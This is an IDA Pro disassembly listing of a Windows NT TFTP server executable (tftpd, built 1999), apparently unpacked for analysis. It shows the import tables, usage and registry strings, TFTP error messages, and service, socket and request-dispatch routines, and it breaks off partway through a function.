;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0341C6090A77D0BEA08F6B1B75862309
; File Name : u:\work\0341c6090a77d0bea08f6b1b75862309_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 00003310 ( 13072.)
; Section size in file : 00003310 ( 13072.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 1001000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_1001000 dd 77D982ACh dword_1001004 dd 77D92985h dword_1001008 dd 77D9858Eh dword_100100C dd 77D97D4Dh dword_1001010 dd 77D92C54h dword_1001014 dd 77DA9694h ; sub_1001DEB+6B�r ...
dd 0
dword_100101C dd 77E7B0BBh dword_1001020 dd 77E74CA6h dword_1001024 dd 77E7C37Ah dword_1001028 dd 77F877E0h dword_100102C dd 77E7C4E4h ; sub_1002F31+1C3�r ...
dword_1001030 dd 77E6670Dh dword_1001034 dd 77E66F37h dword_1001038 dd 77E6668Ch ; sub_1001665:loc_1001762�r ...
dword_100103C dd 77E68778h ; sub_1001A91+1AB�r
dword_1001040 dd 77E6B217h ; sub_10018DB+B4�r ...
dword_1001044 dd 77E68D0Fh ; sub_10019F0+14�r ...
dword_1001048 dd 77E65304h dword_100104C dd 77F8AA7Dh ; sub_1001A91+B5�r ...
dword_1001050 dd 77FC9C41h dword_1001054 dd 77E6A6C8h ; sub_1001E73+9E�r ...
dword_1001058 dd 77F8AA4Ch ; sub_1001A91+4E�r ...
dword_100105C dd 77E74A02h, 77E7E673h, 77FC976Bh, 77E7310Fh ; sub_1001A91+2C1�r ...
dword_100106C dd 77E64B74h ; sub_100205A+4E�r
dword_1001070 dd 77F89789h dword_1001074 dd 77E7CFC6h dd 0
dword_100107C dd 78001DEAh dword_1001080 dd 78003E70h dword_1001084 dd 7800B426h dword_1001088 dd 78014EE9h dword_100108C dd 78014DABh dword_1001090 dd 7801D884h dword_1001094 dd 78001000h ; sub_100205A+93�r ...
dword_1001098 dd 78001EC9h dword_100109C dd 78012188h dword_10010A0 dd 780010EDh ; sub_1001F54+47�r ...
dword_10010A4 dd 7802A875h ; sub_1001DEB+8�r
dword_10010A8 dd 78017A09h dword_10010AC dd 7800C9ACh ; sub_10027E1+77�r ...
dword_10010B0 dd 78017E4Bh, 78022AA9h ; sub_1001665+1DB�r
dword_10010B8 dd 7802A38Bh ; sub_1001DEB+19�r
dword_10010BC dd 78003C1Eh dword_10010C0 dd 7800F56Ah dword_10010C4 dd 78003E5Ah dword_10010C8 dd 78003E64h dword_10010CC dd 78003E6Ah dword_10010D0 dd 7803BB70h dword_10010D4 dd 78025147h dword_10010D8 dd 7800BB9Eh dword_10010DC dd 7800F7DCh, 7800B908h ; .text:01003B7A�r
dword_10010E4 dd 7801D1CFh ; sub_100333A+1B9�r
dword_10010E8 dd 78014B25h dword_10010EC dd 7800269Eh ; sub_1001665+C0�r ...
dd 0
dword_10010F4 dd 74FB1311h dword_10010F8 dd 74FB2B3Ch ; sub_1001A91+12B�r ...
dword_10010FC dd 74FB4A6Ah dword_1001100 dd 74FB5502h dword_1001104 dd 74FB2B57h ; sub_100230A+F�r ...
dword_1001108 dd 74FBD027h dword_100110C dd 74FB2B57h ; sub_1002A3D+40�r ...
; ---------------------------------------------------------------------------
locret_1001110: ; DATA XREF: sub_1001A91+10F�r
retf
; ---------------------------------------------------------------------------
db 0ACh, 0FBh, 74h
dword_1001114 dd 74FB125Ah dword_1001118 dd 74FB894Bh dword_100111C dd 74FB3284h ; sub_100205A+E7�r ...
dword_1001120 dd 74FB5413h ; sub_1002F31+64�r ...
dword_1001124 dd 74FB3A14h ; sub_1002F31+256�r ...
dword_1001128 dd 74FB90C0h dword_100112C dd 74FB3832h ; sub_100333A+1EB�r
dword_1001130 dd 74FB306Fh ; sub_1002A3D+65�r ...
align 8
dword_1001138 dd 77307866h dword_100113C dd 773025A3h dd 0
dword_1001144 dd 77F82A70h dword_1001148 dd 77F8A557h dword_100114C dd 77FB6307h dword_1001150 dd 77F92A89h ; sub_100333A+95�r
dword_1001154 dd 77F97C81h ; sub_1002B5E+114�r ...
dword_1001158 dd 77F816E4h ; sub_1002A3D+FD�r ...
dword_100115C dd 77F8F1D6h dword_1001160 dd 77F9431Dh ; sub_10023D8+F2�r
dword_1001164 dd 77F936B1h dword_1001168 dd 77F912B1h ; sub_1002901+35�r
dword_100116C dd 77F8F73Ch dword_1001170 dd 77F979C8h dword_1001174 dd 77F8D7C7h ; sub_10018DB+D6�r
dword_1001178 dd 77F975A5h ; sub_1002F31+34D�r ...
dd 2 dup(0)
dd 37ECADD7h, 0
dd 4, 110h, 0
dd 4C00h, 0
dd 37ECADD7h, 0
dd 3, 310h, 0
dd 4D10h, 0
dd 37ECADD7h, 0
dd 6, 2 dup(0)
dd 5020h, 0
dd 37ECADD7h, 0
dd 2, 1Ah, 0
db 90h
db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
db ' 22:17:18',0Ah,0
aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4�o
aWritable db 'writable',0 ; DATA XREF: sub_1001570+BF�o
; sub_10037BF+121�o
align 4
aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6�o
aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1�o
; sub_10037BF+F1�o
align 4
aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8�o
aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3�o
; sub_10037BF+C1�o
aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9A�o
aClients db 'clients',0 ; DATA XREF: sub_1001570+95�o
; sub_10037BF+8E�o
aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah
; DATA XREF: sub_1001570+8D�o
db 0
align 4
aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84�o
aDirectory db 'directory',0 ; DATA XREF: sub_1001570+7F�o
; sub_10037BF+5C�o
align 4
aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
; DATA XREF: sub_1001570+76�o
aSystemCurrentc db 'System\CurrentControlSet\Services\tftpd\parameters',0
; DATA XREF: sub_1001570+71�o
; sub_10037BF+13�o
align 10h
aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68�o
db 0Ah,0
align 4
aTftpd_log db 'tftpd.log',0 ; DATA XREF: sub_1001570+63�o
; sub_1001665+1D6�o
align 4
aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5A�o
align 4
aTftpdroot db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55�o
; sub_1003910+1E�o
a? db '-?',0 ; DATA XREF: sub_1001570+10�o
align 4
aA db 'a+',0 ; DATA XREF: sub_1001665+1D1�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_100205A+31�o
align 10h
aUdp db 'udp',0 ; DATA XREF: sub_100205A+2C�o
aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0�o
align 10h
aNoSuchUser db 'No such user',0 ; DATA XREF: .data:01005CDC�o
align 10h
aFileAlreadyExi db 'File already exists',0 ; DATA XREF: .data:01005CD8�o
aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4�o
aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0�o
align 10h
aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCC�o
align 4
aAccessViolatio db 'Access violation',0 ; DATA XREF: .data:01005CC8�o
align 4
aFileNotFound db 'File not found',0 ; DATA XREF: .data:01005CC4�o
align 4
aErrorUndefined db 'Error undefined',0 ; DATA XREF: .data:off_1005CC0�o
aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251A�o
align 10h
aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498�o
aBlksize db 'blksize',0 ; DATA XREF: sub_10023D8+4E�o
aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2�o
aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197�o
; sub_100333A+201�o ...
align 10h
aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195�o
; sub_100333A+1A0�o
align 4
aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139�o
; sub_100333A+159�o
aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2�o
; sub_100333A:loc_100341F�o
align 10h
aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9F�o
; sub_100333A:loc_10033E1�o
align 4
asc_100155C: ; DATA XREF: sub_1003910+7F�o
unicode 0, <\>,0
dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B R O U T I N E =======================================
sub_1001570 proc near ; CODE XREF: .text:01003B4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 1
push esi
jle loc_1001646
mov eax, [esp+4+arg_4]
mov esi, offset a? ; "-?"
mov eax, [eax+4]
loc_1001588: ; CODE XREF: sub_1001570+34�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_10015AA
test cl, cl
jz short loc_10015A6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_10015AA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_1001588
loc_10015A6: ; CODE XREF: sub_1001570+22�j
xor eax, eax
jmp short loc_10015AF
; ---------------------------------------------------------------------------
loc_10015AA: ; CODE XREF: sub_1001570+1E�j
; sub_1001570+2C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_10015AF: ; CODE XREF: sub_1001570+38�j
test eax, eax
jnz loc_1001646
mov esi, ds:dword_10010D4
push offset asc_1005010 ; " ======================================"...
call esi ; dword_10010D4
pop ecx
push offset aTftpdroot ; "\\tftpdroot\\"
push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTftpd_log ; "tftpd.log"
push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aDirectory ; "directory"
push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"...
call esi ; dword_10010D4
pop ecx
push offset aClients ; "clients"
push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aMasters ; "masters"
push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aReadable ; "readable"
push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aWritable ; "writable"
push offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push 0FFFFFFFFh
call ds:dword_10010EC
pop ecx
loc_1001646: ; CODE XREF: sub_1001570+6�j
; sub_1001570+41�j
push offset off_1005CB0
call ds:dword_1001004
test eax, eax
jnz short loc_100165B
call ds:dword_1001038
loc_100165B: ; CODE XREF: sub_1001570+E3�j
push 0
call ds:dword_100101C
pop esi
retn
sub_1001570 endp
; =============== S U B R O U T I N E =======================================
sub_1001665 proc near ; DATA XREF: .data:01005CB4�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push offset sub_1001DEB
push offset aTftpd ; "Tftpd"
mov dword_1006120, 30h
mov dword_1006124, 2
mov dword_1006128, ebp
mov dword_1006134, 1
mov dword_1006138, 4E20h
mov dword_100612C, ebp
mov dword_1006130, ebp
call ds:dword_1001010
cmp eax, ebp
mov dword_1006044, eax
jz loc_1001762
mov esi, ds:dword_1001014
mov edi, offset dword_1006120
push edi
push eax
call esi ; dword_1001014
cmp eax, ebp
jz loc_1001762
mov ebx, ds:dword_1001040
push ebp
push ebp
push ebp
push ebp
call ebx ; dword_1001040
push ebp
push ebp
push ebp
push ebp
mov dword_1005DDC, eax
call ebx ; dword_1001040
cmp dword_1005DDC, ebp
mov dword_1005DE0, eax
jz short loc_100171C
cmp eax, ebp
jz short loc_100171C
push offset dword_1006140
push 101h
call ds:dword_10010FC
cmp eax, 0FFFFFFFFh
jnz short loc_1001735
call ds:dword_10010F8
loc_100171C: ; CODE XREF: sub_1001665+96�j
; sub_1001665+9A�j ...
push 1Fh
call sub_1001E73
push 1
call ds:dword_10010EC
pop ecx
loc_100172C: ; CODE XREF: sub_1001665+218�j
; sub_1001665+224�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_1001735: ; CODE XREF: sub_1001665+AF�j
push edi
mov dword_1006124, 4
push dword_1006044
mov dword_1006128, 7
mov dword_1006134, ebp
mov dword_1006138, ebp
call esi ; dword_1001014
cmp eax, ebp
jnz short loc_100176A
loc_1001762: ; CODE XREF: sub_1001665+57�j
; sub_1001665+6E�j
call ds:dword_1001038
jmp short loc_100171C
; ---------------------------------------------------------------------------
loc_100176A: ; CODE XREF: sub_1001665+FB�j
push 9
pop ecx
xor eax, eax
mov edx, offset dword_10060C0
mov edi, edx
rep stosd
push edx
call ds:dword_10010A4
pop ecx
mov edx, [esp+10h+arg_0]
dec edx
mov ebx, (offset dword_1005E07+1)
jz short loc_10017F3
mov eax, [esp+10h+arg_4]
lea eax, [eax+edx*4]
mov [esp+10h+arg_0], eax
loc_1001797: ; CODE XREF: sub_1001665+18C�j
mov eax, [esp+10h+arg_0]
mov eax, [eax]
cmp byte ptr [eax], 2Dh
jnz short loc_10017F3
movsx ecx, byte ptr [eax+1]
sub ecx, 64h
jz short loc_10017C9
dec ecx
jz short loc_10017BD
dec ecx
jnz short loc_10017E9
mov dword_1005DD8, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017BD: ; CODE XREF: sub_1001665+147�j
mov dword_1005DD4, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017C9: ; CODE XREF: sub_1001665+144�j
lea edi, [eax+2]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10017E9: ; CODE XREF: sub_1001665+14A�j
; sub_1001665+156�j ...
sub [esp+10h+arg_0], 4
dec edx
cmp edx, ebp
ja short loc_1001797
loc_10017F3: ; CODE XREF: sub_1001665+125�j
; sub_1001665+13B�j
call sub_10037BF
call sub_1003910
mov esi, ds:dword_10010A8
push ebx
call esi ; dword_10010A8
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_100182E
call ds:dword_10010AC
push ebx
call ds:dword_10010B0
cmp eax, ebp
pop ecx
jnz loc_100171C
push ebx
call esi ; dword_10010A8
cmp eax, ebp
pop ecx
jnz loc_100171C
loc_100182E: ; CODE XREF: sub_1001665+1A5�j
cmp dword_1005DD8, ebp
jz short loc_1001857
push offset aA ; "a+"
push offset aTftpd_log ; "tftpd.log"
call ds:dword_10010B0+4
pop ecx
cmp eax, ebp
pop ecx
mov dword_1005DD0, eax
jnz short loc_1001857
mov dword_1005DD8, ebp
loc_1001857: ; CODE XREF: sub_1001665+1CF�j
; sub_1001665+1EA�j
push offset dword_10060C0
call ds:dword_10010B8
pop ecx
call sub_10018DB
call sub_10019F0
push 0FFFFFFFFh
push dword_1005DDC
call ds:dword_100103C
cmp eax, ebp
jz loc_100172C
call ds:dword_1001038
jmp loc_100172C
sub_1001665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100188E proc near ; CODE XREF: sub_100205A+D5�p
; sub_1002F31+2A8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push 3
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_1001100
test eax, eax
jz short loc_10018AE
call ds:dword_1001038
xor eax, eax
jmp short locret_10018D7
; ---------------------------------------------------------------------------
loc_10018AE: ; CODE XREF: sub_100188E+14�j
test [ebp+arg_8], 1
push 0
push 0FFFFFFFFh
push [ebp+arg_0]
jz short loc_10018C2
push offset loc_1001D74
jmp short loc_10018C7
; ---------------------------------------------------------------------------
loc_10018C2: ; CODE XREF: sub_100188E+2B�j
push offset loc_1001DDB
loc_10018C7: ; CODE XREF: sub_100188E+32�j
push [ebp+arg_4]
lea eax, [ebp+var_4]
push eax
call ds:dword_1001174
mov eax, [ebp+var_4]
locret_10018D7: ; CODE XREF: sub_100188E+1E�j
leave
retn 0Ch
sub_100188E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018DB proc near ; CODE XREF: sub_1001665+1FE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:dword_1001044
push edi
push offset dword_1006080
call esi ; dword_1001044
push offset dword_1006020
call esi ; dword_1001044
mov eax, offset dword_1006098
mov dword_100609C, eax
mov dword_1006098, eax
mov eax, offset dword_1006038
mov dword_100603C, eax
mov dword_1006038, eax
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
xor esi, esi
test eax, eax
jnz short loc_1001957
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_100194F
xor edi, edi
loc_100192E: ; CODE XREF: sub_10018DB+72�j
mov ecx, [eax+edi+4]
cmp ecx, esi
jz short loc_1001947
cmp ecx, 100007Fh
jz short loc_1001947
push ecx
call sub_100205A
mov eax, [ebp+var_4]
loc_1001947: ; CODE XREF: sub_10018DB+59�j
; sub_10018DB+61�j
inc ebx
add edi, 18h
cmp ebx, [eax]
jb short loc_100192E
loc_100194F: ; CODE XREF: sub_10018DB+4F�j
push eax
call ds:dword_10010A0
pop ecx
loc_1001957: ; CODE XREF: sub_10018DB+46�j
push offset dword_10060A0
call ds:dword_1001170
cmp eax, esi
jnz loc_10019EB
mov eax, 0EA60h
push esi
push eax
push eax
push esi
push offset sub_10029BA
push offset dword_1006048
push dword_10060A0
call ds:dword_1001178
push esi
push esi
push esi
push esi
mov edi, eax
call ds:dword_1001040
cmp eax, esi
mov dword_1005DF8, eax
jnz short loc_10019A2
mov eax, edi
jmp short loc_10019EB
; ---------------------------------------------------------------------------
loc_10019A2: ; CODE XREF: sub_10018DB+C1�j
push esi
push 0FFFFFFFFh
push esi
push offset sub_1002219
push eax
push offset dword_1005DFC
call ds:dword_1001174
cmp eax, esi
jnz short loc_10019EB
mov ecx, offset dword_1006100
xor eax, eax
mov edi, ecx
push ecx
stosd
stosd
stosd
stosd
stosd
mov eax, dword_1005DF8
push offset dword_1005E00
mov dword_1006110, eax
call sub_1003A44
cmp eax, esi
jz short loc_10019E9
cmp eax, 3E5h
jnz short loc_10019EB
loc_10019E9: ; CODE XREF: sub_10018DB+105�j
xor eax, eax
loc_10019EB: ; CODE XREF: sub_10018DB+89�j
; sub_10018DB+C5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_10018DB endp
; =============== S U B R O U T I N E =======================================
sub_10019F0 proc near ; CODE XREF: sub_1001665+203�p
mov eax, offset dword_1006078
push offset dword_1006060
mov dword_100607C, eax
mov dword_1006078, eax
call ds:dword_1001044
push 0
push 0EFD1Ch
push 0
call ds:dword_1001048
mov dword_1005DEC, eax
retn
sub_10019F0 endp
; =============== S U B R O U T I N E =======================================
sub_1001A1F proc near ; CODE XREF: sub_10029BA+79�p
push ebx
push esi
mov ebx, offset dword_1006060
push edi
push ebx
xor esi, esi
call ds:dword_1001058
mov eax, dword_1005DF0
sub eax, dword_1005DF4
cmp eax, 0Ah
jbe short loc_1001A46
shr eax, 1
mov esi, eax
jmp short loc_1001A4E
; ---------------------------------------------------------------------------
loc_1001A46: ; CODE XREF: sub_1001A1F+1F�j
cmp eax, 3
jbe short loc_1001A4E
push 2
pop esi
loc_1001A4E: ; CODE XREF: sub_1001A1F+25�j
; sub_1001A1F+2A�j
test esi, esi
jbe short loc_1001A86
mov edi, esi
loc_1001A54: ; CODE XREF: sub_1001A1F+65�j
mov eax, dword_1006078
mov esi, eax
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call ds:dword_1001054
push esi
push 0
push dword_1005DEC
call ds:dword_1001050
dec dword_1005DF0
dec edi
jnz short loc_1001A54
loc_1001A86: ; CODE XREF: sub_1001A1F+31�j
push ebx
call ds:dword_100104C
pop edi
pop esi
pop ebx
retn
sub_1001A1F endp
; =============== S U B R O U T I N E =======================================
sub_1001A91 proc near ; CODE XREF: .text:01001DCC�p
; .text:01001DE1�p
var_68 = byte ptr -68h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_10 = byte ptr 14h
arg_FF9C = dword ptr 0FFA0h
arg_FFA0 = dword ptr 0FFA4h
arg_FFA4 = dword ptr 0FFA8h
arg_FFA8 = dword ptr 0FFACh
arg_FFD4 = dword ptr 0FFD8h
arg_FFD8 = dword ptr 0FFDCh
arg_10004 = dword ptr 10008h
mov eax, 10004h
call sub_1003A3E
push ebx
push ebp
xor ebp, ebp
push esi
push edi
mov [esp+10h], ebp
mov ebx, offset dword_1006060
loc_1001AAA: ; CODE XREF: sub_1001A91+291�j
lea eax, [esp+10h+arg_0]
push eax
push 4004667Fh
push [esp+18h+arg_10004]
call ds:dword_1001114
cmp eax, ebp
jnz loc_1001D27
cmp [esp+1Ch+var_8], ebp
jz loc_1001D65
xor eax, eax
lea edi, [esp+1Ch+arg_10]
stosd
stosd
stosd
stosd
push ebx
stosd
call ds:dword_1001058
mov eax, dword_1006078
inc dword_1005DF4
cmp eax, offset dword_1006078
jz short loc_1001B11
mov ecx, [eax]
mov esi, eax
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call ds:dword_100105C+0Ch
mov eax, [esi+30h]
jmp short loc_1001B41
; ---------------------------------------------------------------------------
loc_1001B11: ; CODE XREF: sub_1001A91+64�j
inc dword_1005DF0
push 2FF6Ch
push 8
push dword_1005DEC
call ds:dword_100105C+8
mov esi, eax
cmp esi, ebp
jz loc_1001D5E
push ebp
push ebp
push ebp
push ebp
call ds:dword_1001040
mov [esi+30h], eax
loc_1001B41: ; CODE XREF: sub_1001A91+7E�j
push ebx
mov [esp+40h+arg_0], eax
call ds:dword_100104C
lea ebp, [esi+34h]
mov ecx, 3FEFh
xor eax, eax
mov edi, ebp
rep stosd
stosb
mov eax, [esp+40h+arg_FFD8]
mov [esp+40h+var_1C], ebp
mov [esp+40h+var_20], 0FFBDh
mov [esp+40h+var_28], 10h
mov [esi+1Ch], eax
lea eax, [esp+40h+var_10]
push 0
push eax
lea eax, [esp+48h+var_28]
lea edi, [esi+2Ch]
push eax
lea eax, [esi+0Ch]
push eax
lea eax, [esp+50h+var_30]
push eax
push edi
lea eax, [esp+58h+var_20]
push 1
push eax
push [esp+60h+arg_FFD4]
call dword ptr ds:locret_1001110
mov [esp+64h+var_48], eax
mov ax, [esi+0Eh]
push eax
call ds:dword_100110C
cmp [esp+68h+var_4C], 0
jz short loc_1001C34
call ds:dword_10010F8
cmp eax, 3E5h
jnz loc_1001D2F
mov eax, dword_1005DDC
push 0FFFFFFFFh
mov [esp+6Ch+var_40], eax
mov eax, [esp+6Ch+var_28]
mov [esp+6Ch+var_3C], eax
lea eax, [esp+6Ch+var_40]
push 0
push eax
push 2
call ds:dword_100105C+4
cmp eax, 0FFFFFFFFh
jz loc_1001D2F
cmp eax, 102h
jz loc_1001D2F
test eax, eax
jz loc_1001D2F
lea eax, [esp+78h+var_68]
push eax
push 0
lea eax, [esp+80h+var_48]
push edi
push eax
push [esp+88h+arg_FF9C]
call ds:dword_1001108
test eax, eax
jnz short loc_1001C34
call ds:dword_10010F8
jmp loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C34: ; CODE XREF: sub_1001A91+129�j
; sub_1001A91+196�j
push 0
push dword_1005DDC
call ds:dword_100103C
test eax, eax
jz loc_1001D2F
cmp dword ptr [edi], 2
jl loc_1001CEA
xor edi, edi
cmp [esp+70h+arg_FFA8], edi
jz short loc_1001CDA
mov ax, [ebp+0]
push eax
call ds:dword_1001104
movzx ecx, ax
test ecx, ecx
jle short loc_1001CB8
cmp ecx, 2
jle short loc_1001C81
cmp ecx, 4
jz short loc_1001CB8
cmp ecx, 5
jnz short loc_1001CB8
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001C81: ; CODE XREF: sub_1001A91+1E2�j
cmp ax, 1
jnz short loc_1001C94
inc dword_10060C4
mov edi, offset sub_1002F31
jmp short loc_1001CA5
; ---------------------------------------------------------------------------
loc_1001C94: ; CODE XREF: sub_1001A91+1F4�j
cmp ax, 2
jnz short loc_1001CA5
inc dword_10060C8
mov edi, offset sub_100333A
loc_1001CA5: ; CODE XREF: sub_1001A91+201�j
; sub_1001A91+207�j
mov eax, [esp+74h+arg_FFA0]
test edi, edi
mov [esi+8], eax
jz short loc_1001CEA
push esi
call edi ; sub_1002F31
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CB8: ; CODE XREF: sub_1001A91+1DD�j
; sub_1001A91+1E7�j ...
push 0
push 4
push [esp+7Ch+arg_FFA0]
inc dword_10060CC
lea eax, [esp+80h+var_20]
push eax
lea eax, [esp+84h+var_30]
push eax
call sub_100230A
jmp short loc_1001CEA
; ---------------------------------------------------------------------------
loc_1001CDA: ; CODE XREF: sub_1001A91+1CB�j
mov eax, [esp+70h+arg_FFA4]
push esi
mov [esi+8], eax
call sub_1002EC8
loc_1001CEA: ; CODE XREF: sub_1001A91+19E�j
; sub_1001A91+1BC�j ...
push ebx
call ds:dword_1001058
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call ds:dword_100105C
dec dword_1005DF4
push ebx
call ds:dword_100104C
xor ebp, ebp
jmp loc_1001AAA
; ---------------------------------------------------------------------------
loc_1001D27: ; CODE XREF: sub_1001A91+32�j
call ds:dword_10010F8
jmp short loc_1001D65
; ---------------------------------------------------------------------------
loc_1001D2F: ; CODE XREF: sub_1001A91+136�j
; sub_1001A91+161�j ...
push ebx
call ds:dword_1001058
mov eax, dword_1006078
mov dword ptr [esi+4], offset dword_1006078
mov [esi], eax
push offset dword_1005DE8
mov [eax+4], esi
mov dword_1006078, esi
call ds:dword_100105C
dec dword_1005DF4
loc_1001D5E: ; CODE XREF: sub_1001A91+9D�j
push ebx
call ds:dword_100104C
loc_1001D65: ; CODE XREF: sub_1001A91+3C�j
; sub_1001A91+29C�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 10004h
retn 8
sub_1001A91 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_1001D74: ; DATA XREF: sub_100188E+2D�o
push ecx
push ebx
push ebp
push esi
mov esi, offset dword_1006020
push edi
mov edi, ds:dword_1001070
push esi
xor ebp, ebp
xor ebx, ebx
call edi ; dword_1001070
loc_1001D8B: ; CODE XREF: .text:01001DA1�j
test eax, eax
jnz short loc_1001DA7
push 0C8h
call ds:dword_100106C
push esi
call edi ; dword_1001070
inc ebx
cmp ebx, 7Dh
jb short loc_1001D8B
test eax, eax
jz short loc_1001DD1
loc_1001DA7: ; CODE XREF: .text:01001D8D�j
lea eax, [esp+10h]
push eax
push dword ptr [esp+1Ch]
call sub_10021E5
test eax, eax
jnz short loc_1001DC0
mov eax, [esp+10h]
mov ebp, [eax+0Ch]
loc_1001DC0: ; CODE XREF: .text:01001DB7�j
push esi
call ds:dword_100104C
push ebp
push dword ptr [esp+1Ch]
call sub_1001A91
loc_1001DD1: ; CODE XREF: .text:01001DA5�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1001DDB: ; DATA XREF: sub_100188E:loc_10018C2�o
push 0
